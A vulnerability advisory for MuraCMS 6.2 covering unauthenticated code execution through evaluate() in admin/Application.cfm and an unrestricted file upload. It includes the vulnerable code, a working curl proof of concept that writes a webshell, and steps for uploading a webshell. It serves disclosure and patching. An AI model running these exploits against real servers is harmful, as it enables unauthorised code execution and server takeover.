SSD Advisory – MuraCMS Multiple Vulnerabilities

Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in MuraCMS version 6.2. MuraCMS is an open source content management system for CFML, created by Blue River Interactive Group. Mura has been designed to be used by marketing departments, web designers and developers.
The vulnerabilities found in MuraCMS are:

  1. Unauthenticated remote arbitrary code execution
  2. Unrestricted file upload

Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
BlurRiver has released patch to address the vulnerabilities: “we put builds with the vulnerabilities patched and then released a blog as well as communicated via our Google group, Slack channel, twitter and mailing list.”
The patch and blog post can be found here

Vulnerabilities details
Unauthenticated remote arbitrary code execution
The vulnerable function that can lead to remote arbitrary code execution is “evaluate” and can be found in admin/Application.cfm.
The function “evaluate” is evaluates dynamically its parameter (string). In this case it is used with the intent of checking the value of a http’s parameter. This parameter depends on the variable “#theParam#“, that is obtained by splitting another http’s parameter, named “param”.
An Attacker can inject arbitrary code into this parameter. An example of malicious code could be “1+or+eq+<a function>”. So the evaluate function will evaluate the string “request.context.paramField1+or+eq+</a><a function>”.
However, because of the splitting function (“listLen”), you can inject only functions that have none or one parameter, because if a function has two or more parameters it will be splitted, and it will return a fatal error
In order to bypass this issue, an attacker can simply pass another evaluate function, with a different http’s parameter as argument. So the malicious code will be “1+or+eq+evaluate(#request.context.payload#)” , having no commas, putting the malicious code inside payload.
Vulnerable code: File:/admin/Application.cfm Line:428
The code will be executed every time, even if the users isn’t logged in. Since the function that checks the user session will continue the execution of the code even if the user isn’t logged in, it will only modify the “location”.

if(request.context.param neq ''){
      session.paramArray=arrayNew(1);
      session.paramCircuit=listLast(listFirst(request.context.muraAction,'.'),':');
      for(i=1;i lte listLen(request.context.param);i=i+1){
            theParam=listGetAt(request.context.param,i);
            if(evaluate('request.context.paramField#theParam#') neq 'Select Field'
                  and evaluate('request.context.paramField#theParam#') neq ''
                  and evaluate('request.context.paramCriteria#theParam#') neq ''){

Proof of Concept

#!/bin/bash
host="127.0.0.1"
path="/"
url="${path}admin/"
useragent="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0"
#Here the code to be uploaded and write into a file in the home directory
shell="<cfexecute   name = 'whoami'  arguments = '' timeout=2> </cfexecute>"
#filename of the uploaded file
shellname="shell.cfm"
#Path of the shell. It must not be /admin/ path, because it will ask for user login.
shellpath="../"
#Payload: in this case it will write a file
payload="FileWrite(\"${shellpath}${shellname}\", \"${shell}\")"
#Run requests.
curl -i -s -k -X "POST" -H "User-Agent: ${useragent}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-b ''\
--data-binary $"param=1+eq+true+or+evaluate(#request.context.payload#)&paramField1=false&payload=${payload}" \
     "http://${host}${url}"
resp=`curl -i -s -k -H "User-Agent: ${useragent}"  "http://${host}/${shellname}"`
echo $resp

Unrestricted file upload
MuraCMS allows its end users to upload as well as download files on the server. MuraCMS does not sanitize the file properly before moving it to an uploads directory. Every user logged in the web application with editing permissions, could upload a malicious webshell.
Proof of Concept

  1. Login with test editor user and go to the site manager page
  2. Click on “edit” button in “Home”
  3. In the “Assign Associated Image” section click on browse and upload the malicious webshell.cfm from your pc
  4. Click on publish button
  5. In order to know where the file is located it enough to fire up a web intercepting tool like Burp or Tamper data and click on download file.
  6. If you will use the Burp for example. you can able to see a request like following:
  7. GET /index.cfm/_api/render/file/?fileid=ABD5B173-790C-4973-
    991504D56A3DF2B5&method=attachment&size=source HTTP/1.1
    Host: 192.168.0.101:8888
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Page 6 of 7
    Referer: http://192.168.0.101:8888/admin/?muraAction=cArch.edit&contenthistid=E854D858-A5EF-46FAA8F5F7B343C93958&siteid=default&contentid=00000000000000000000000000000000001&topid=00000000000000000000000000000000001&type=Page&parentid=00000000000000000000000000000000END&moduleid=00000000000000000000000000000000000
    Cookie: cfid=f4d255c5-4789-420c-8a41-a925671b1ae0; cftoken=0;
    ORIGINALURLTOKEN=A589BA35-0260-4163-BF03CCC534A9AFC7; MOBILEFORMAT=false;
    JSESSIONID=D06BAFB1A7DFCE934D82C6B804CD7AEE; CKFinder_Path=default_Site_Files%3A%2Fcache%2Ffile%2F%3A1;
    FETDISPLAY=; REMEMBER=0; SUBSCRIBE=0; NAME=; URL=; EMAIL=
    Connection: keep-alive
  8. The red string is the name of our webshell renamed by the webapp
  9. Now it is possible to point the browser on http:/// default/cache/file/ABD5B173-790C-4973-991504D56A3DF2B5.cfm